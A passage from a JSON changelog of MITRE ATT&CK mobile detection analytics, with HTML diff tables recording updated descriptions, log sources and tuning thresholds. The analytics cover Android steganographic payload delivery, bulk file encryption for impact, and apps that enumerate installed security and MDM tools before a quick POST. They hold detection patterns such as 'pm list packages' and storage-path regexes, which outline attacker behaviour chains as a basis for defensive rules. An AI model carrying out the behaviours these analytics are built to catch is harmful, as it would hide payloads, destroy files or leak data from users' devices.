class=\"diff_sub\">Android&nbsp;versions).&nbsp;&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;fo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ress.&nbsp;Chain:&nbsp;scene&nbsp;activation&nbsp;around&nbsp;sensitive&nbsp;UI&nbsp;\u2192&nbsp;suspicio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">r&nbsp;applications&nbsp;requesting&nbsp;the&nbsp;`android.permission.SYSTEM_ALE</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">us&nbsp;prompt&nbsp;creation&nbsp;(UIKit&nbsp;events&nbsp;without&nbsp;expected&nbsp;auth&nbsp;contr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">RT_WINDOW`&nbsp;permission&nbsp;in&nbsp;the&nbsp;list&nbsp;of&nbsp;permissions&nbsp;in&nbsp;the&nbsp;app&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oller)&nbsp;or&nbsp;webview&nbsp;navigated&nbsp;to&nbsp;look-alike&nbsp;domain&nbsp;\u2192&nbsp;local&nbsp;cac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">manifest.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">he&nbsp;write&nbsp;\u2192&nbsp;near-term&nbsp;egress</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--cda313bc-214f-4bf8-9aa2-b3fb495379c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-22 19:50:50.601000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0677#AN1780",
                            "external_id": "AN1780"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1780",
                    "description": "Defender correlates an app's opaque media ingress (download/IPC) with high-entropy or anomalous edits to image/audio/video files in app-writable storage (e.g., bursts of bitmap/codec operations, EXIF/IPTC/XMP mutation, suspicious container growth), followed by decoding/extraction behavior (new non-media artifact derived from the edited media) and optional exfiltration/sharing of the stego media. Focus is on: (1) opaque media arrival \u2192 (2) rapid metadata or pixel-domain mutations with atypical size/entropy deltas \u2192 (3a) decoded payload creation or dynamic load from decoded path, and/or (3b) upload/share of the modified media within a tight window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "android:logcat",
                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time between media download/ingress, edit, and payload use/share (e.g., 10\u2013120s depending on device performance)."
                        },
                        {
                            "field": "PayloadEntropyThresholdMediaSegment",
                            "description": "Minimum Shannon entropy for edited media regions or container deltas (e.g., \u2265 7.1) to flag likely embedded payloads."
                        },
                        {
                            "field": "SizeDeltaRatio",
                            "description": "Minimum growth ratio between pre/post edit media (e.g., \u2265 1.25) to reduce noise from normal compression."
                        },
                        {
                            "field": "EditBurstWriteCount",
                            "description": "Minimum sequential small-write count to indicate chunked embedding or re-encode bursts."
                        },
                        {
                            "field": "SuspiciousMimeTransitions",
                            "description": "List of atypical MIME/container transitions (e.g., PNG\u2192JPEG with EXIF injection, WAV\u2192M4A) for local tuning."
                        },
                        {
                            "field": "KnownGoodMediaAppsAllowlist",
                            "description": "Trusted editors/camera apps allowed to perform frequent edits without alerting."
                        },
                        {
                            "field": "NetworkCDNAllowlist",
                            "description": "CDNs/domains expected to host user media for the enterprise; suppresses FP for legitimate apps."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground, Work Profile, developer mode flags used to scope analytics."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8\", \"name\": \"android:logcat\", \"channel\": \"INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  \"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time between media download/ingress, edit, and payload use/share (e.g., 10\\u2013120s depending on device performance).\"}, {\"field\": \"PayloadEntropyThresholdMediaSegment\", \"description\": \"Minimum Shannon entropy for edited media regions or container deltas (e.g., \\u2265 7.1) to flag likely embedded payloads.\"}, {\"field\": \"SizeDeltaRatio\", \"description\": \"Minimum growth ratio between pre/post edit media (e.g., \\u2265 1.25) to reduce noise from normal compression.\"}, {\"field\": \"EditBurstWriteCount\", \"description\": \"Minimum sequential small-write count to indicate chunked embedding or re-encode bursts.\"}, {\"field\": \"SuspiciousMimeTransitions\", \"description\": \"List of atypical MIME/container transitions (e.g., PNG\\u2192JPEG with EXIF injection, WAV\\u2192M4A) for local tuning.\"}, {\"field\": \"KnownGoodMediaAppsAllowlist\", \"description\": \"Trusted editors/camera apps allowed to perform frequent edits without alerting.\"}, {\"field\": \"NetworkCDNAllowlist\", \"description\": \"CDNs/domains expected to host user media for the enterprise; suppresses FP for legitimate apps.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground, Work Profile, developer mode flags used to scope analytics.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-22 19:50:50.601000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app's opaque media ingress (download/IPC) with high-entropy or anomalous edits to image/audio/video files in app-writable storage (e.g., bursts of bitmap/codec operations, EXIF/IPTC/XMP mutation, suspicious container growth), followed by decoding/extraction behavior (new non-media artifact derived from the edited media) and optional exfiltration/sharing of the stego media. Focus is on: (1) opaque media arrival \\u2192 (2) rapid metadata or pixel-domain mutations with atypical size/entropy deltas \\u2192 (3a) decoded payload creation or dynamic load from decoded path, and/or (3b) upload/share of the modified media within a tight window.\", \"old_value\": \"Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. Look for strings are other signatures left in system artifacts related to decoding steganography.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to116__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to116__0\"><a href=\"#difflib_chg_to116__top\">t</a></td><td class=\"diff_header\" id=\"from116_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;steganography&nbsp;is&nbsp;difficult&nbsp;unless&nbsp;detectable&nbsp;ar</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to116__top\">t</a></td><td class=\"diff_header\" id=\"to116_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app's&nbsp;opaque&nbsp;media&nbsp;ingress&nbsp;(download/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tifacts&nbsp;with&nbsp;a&nbsp;known&nbsp;signature&nbsp;are&nbsp;left&nbsp;behind&nbsp;by&nbsp;the&nbsp;obfusc</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">IPC)&nbsp;with&nbsp;high-entropy&nbsp;or&nbsp;anomalous&nbsp;edits&nbsp;to&nbsp;image/audio/vid</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ation&nbsp;process.&nbsp;Look&nbsp;for&nbsp;strings&nbsp;are&nbsp;other&nbsp;signatures&nbsp;left&nbsp;in</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eo&nbsp;files&nbsp;in&nbsp;app-writable&nbsp;storage&nbsp;(e.g.,&nbsp;bursts&nbsp;of&nbsp;bitmap/cod</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;system&nbsp;artifacts&nbsp;related&nbsp;to&nbsp;decoding&nbsp;steganography.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ec&nbsp;operations,&nbsp;EXIF/IPTC/XMP&nbsp;mutation,&nbsp;suspicious&nbsp;container&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">growth),&nbsp;followed&nbsp;by&nbsp;decoding/extraction&nbsp;behavior&nbsp;(new&nbsp;non-m</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">edia&nbsp;artifact&nbsp;derived&nbsp;from&nbsp;the&nbsp;edited&nbsp;media)&nbsp;and&nbsp;optional&nbsp;ex</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">filtration/sharing&nbsp;of&nbsp;the&nbsp;stego&nbsp;media.&nbsp;Focus&nbsp;is&nbsp;on:&nbsp;(1)&nbsp;opaq</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ue&nbsp;media&nbsp;arrival&nbsp;\u2192&nbsp;(2)&nbsp;rapid&nbsp;metadata&nbsp;or&nbsp;pixel-domain&nbsp;mutati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ons&nbsp;with&nbsp;atypical&nbsp;size/entropy&nbsp;deltas&nbsp;\u2192&nbsp;(3a)&nbsp;decoded&nbsp;payload</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;creation&nbsp;or&nbsp;dynamic&nbsp;load&nbsp;from&nbsp;decoded&nbsp;path,&nbsp;and/or&nbsp;(3b)&nbsp;upl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oad/share&nbsp;of&nbsp;the&nbsp;modified&nbsp;media&nbsp;within&nbsp;a&nbsp;tight&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c37bba44-9ca2-4444-8ee9-7cab0b2fd5fd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-12 17:25:00.733000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0678#AN1781",
                            "external_id": "AN1781"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1781",
                    "description": "An application with access to broad file scopes or sensitive storage areas becomes active, performs abnormal burst file reads and writes across many user or shared-storage locations, transforms file content or extensions at scale in a short window, and causes rapid file inaccessibility, rewrite, or replacement inconsistent with normal sync, backup, media processing, or document-editing behavior. The defender correlates capability state, app lifecycle, framework use, bulk file-write effects, and optional network communications to distinguish encrypt-for-impact behavior from benign bulk file operations.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "android:MDMLog",
                            "channel": "Managed storage, backup, enterprise file access, or device policy state remains unchanged while bulk destructive file transformation occurs"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application holds or is granted broad storage, document-provider, media, or file-management capability inconsistent with its expected role before or during bulk file transformation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application runs in foreground, service, or sustained background-active state while concentrated file transformation occurs with weak or no recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum correlation span between app activation, framework use, and burst file transformation."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved apps allowed to perform legitimate broad file operations such as backup, sync, AV scanning, enterprise migration, media editing, or document management."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether a benign bulk file operation is expected to occur only while the app is visible and actively used."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Threshold for determining whether large-scale file transformation was user-driven versus unattended."
                        },
                        {
                            "field": "FileWriteBurstThreshold",
                            "description": "Threshold for number of file create, overwrite, rename, or replace actions within the correlation window."
                        },
                        {
                            "field": "DistinctDirectoryThreshold",
                            "description": "Threshold for number of distinct folders or content roots touched during the file-impact burst."
                        },
                        {
                            "field": "ExtensionChangeThreshold",
                            "description": "Threshold for suspicious file extension changes or replacement-file patterns indicative of mass transformation."
                        },
                        {
                            "field": "BytesWrittenThreshold",
                            "description": "Threshold for cumulative bytes written during the impact window."
                        },
                        {
                            "field": "ProtectedPathAllowList",
                            "description": "Known paths, document roots, or work-profile storage locations where benign enterprise migration or sync tooling may rewrite many files."
                        },
                        {
                            "field": "DestinationAllowList",
                            "description": "Expected network destinations contacted by legitimate storage, sync, backup, or MDM remediation apps."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum correlation span between app activation, framework use, and burst file transformation.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved apps allowed to perform legitimate broad file operations such as backup, sync, AV scanning, enterprise migration, media editing, or document management.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether a benign bulk file operation is expected to occur only while the app is visible and actively used.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Threshold for determining whether large-scale file transformation was user-driven versus unattended.\"}, {\"field\": \"FileWriteBurstThreshold\", \"description\": \"Threshold for number of file create, overwrite, rename, or replace actions within the correlation window.\"}, {\"field\": \"DistinctDirectoryThreshold\", \"description\": \"Threshold for number of distinct folders or content roots touched during the file-impact burst.\"}, {\"field\": \"ExtensionChangeThreshold\", \"description\": \"Threshold for suspicious file extension changes or replacement-file patterns indicative of mass transformation.\"}, {\"field\": \"BytesWrittenThreshold\", \"description\": \"Threshold for cumulative bytes written during the impact window.\"}, {\"field\": \"ProtectedPathAllowList\", \"description\": \"Known paths, document roots, or work-profile storage locations where benign enterprise migration or sync tooling may rewrite many files.\"}, {\"field\": \"DestinationAllowList\", \"description\": \"Expected network destinations contacted by legitimate storage, sync, backup, or MDM remediation apps.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-12 17:25:00.733000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"An application with access to broad file scopes or sensitive storage areas becomes active, performs abnormal burst file reads and writes across many user or shared-storage locations, transforms file content or extensions at scale in a short window, and causes rapid file inaccessibility, rewrite, or replacement inconsistent with normal sync, backup, media processing, or document-editing behavior. The defender correlates capability state, app lifecycle, framework use, bulk file-write effects, and optional network communications to distinguish encrypt-for-impact behavior from benign bulk file operations.\", \"old_value\": \"Application vetting services may be able to detect if an application attempts to encrypt files, although this may be benign behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"android:MDMLog\", \"channel\": \"Managed storage, backup, enterprise file access, or device policy state remains unchanged while bulk destructive file transformation occurs\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application holds or is granted broad storage, document-provider, media, or file-management capability inconsistent with its expected role before or during bulk file transformation\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application runs in foreground, service, or sustained background-active state while concentrated file transformation occurs with weak or no recent user interaction\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to94__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to94__0\"><a href=\"#difflib_chg_to94__top\">t</a></td><td class=\"diff_header\" id=\"from94_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;detect&nbsp;if&nbsp;an&nbsp;app</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to94__top\">t</a></td><td class=\"diff_header\" id=\"to94_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">An&nbsp;application&nbsp;with&nbsp;access&nbsp;to&nbsp;broad&nbsp;file&nbsp;scopes&nbsp;or&nbsp;sensitive</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">lication&nbsp;attempts&nbsp;to&nbsp;encrypt&nbsp;files,&nbsp;although&nbsp;this&nbsp;may&nbsp;be&nbsp;ben</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;storage&nbsp;areas&nbsp;becomes&nbsp;active,&nbsp;performs&nbsp;abnormal&nbsp;burst&nbsp;file&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ign&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">reads&nbsp;and&nbsp;writes&nbsp;across&nbsp;many&nbsp;user&nbsp;or&nbsp;shared-storage&nbsp;location</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s,&nbsp;transforms&nbsp;file&nbsp;content&nbsp;or&nbsp;extensions&nbsp;at&nbsp;scale&nbsp;in&nbsp;a&nbsp;short</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;window,&nbsp;and&nbsp;causes&nbsp;rapid&nbsp;file&nbsp;inaccessibility,&nbsp;rewrite,&nbsp;or&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">replacement&nbsp;inconsistent&nbsp;with&nbsp;normal&nbsp;sync,&nbsp;backup,&nbsp;media&nbsp;pro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cessing,&nbsp;or&nbsp;document-editing&nbsp;behavior.&nbsp;The&nbsp;defender&nbsp;correlat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">es&nbsp;capability&nbsp;state,&nbsp;app&nbsp;lifecycle,&nbsp;framework&nbsp;use,&nbsp;bulk&nbsp;file</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-write&nbsp;effects,&nbsp;and&nbsp;optional&nbsp;network&nbsp;communications&nbsp;to&nbsp;disti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nguish&nbsp;encrypt-for-impact&nbsp;behavior&nbsp;from&nbsp;benign&nbsp;bulk&nbsp;file&nbsp;ope</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rations.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--87d2ccc4-f82e-493d-9c6f-03303253aec2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-02 16:07:33.370000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0680#AN1784",
                            "external_id": "AN1784"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1784",
                    "description": "Defender observes an app enumerating installed security/management controls (AV/EDR/MDM/VPN/Play Protect) via PackageManager, DevicePolicyManager, AppOps, and Settings queries or shell \u2018pm list\u2019 usage, optionally probing Accessibility/Device Admin state. Enumeration is followed by local inventory artifact creation and/or small egress. Chain: capability to query \u2192 burst of security-focused checks (packages/permissions/policies) \u2192 optional foreground targeting \u2192 artifact write \u2192 quick POST.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "android:logcat",
                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "android:logcat",
                            "channel": "Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from discovery burst to persist/exfil (e.g., 10\u2013120s)."
                        },
                        {
                            "field": "MinEnumCount",
                            "description": "Minimum API calls/rows indicating inventory (e.g., \u226530 in 10s)."
                        },
                        {
                            "field": "SecurityTargetsList",
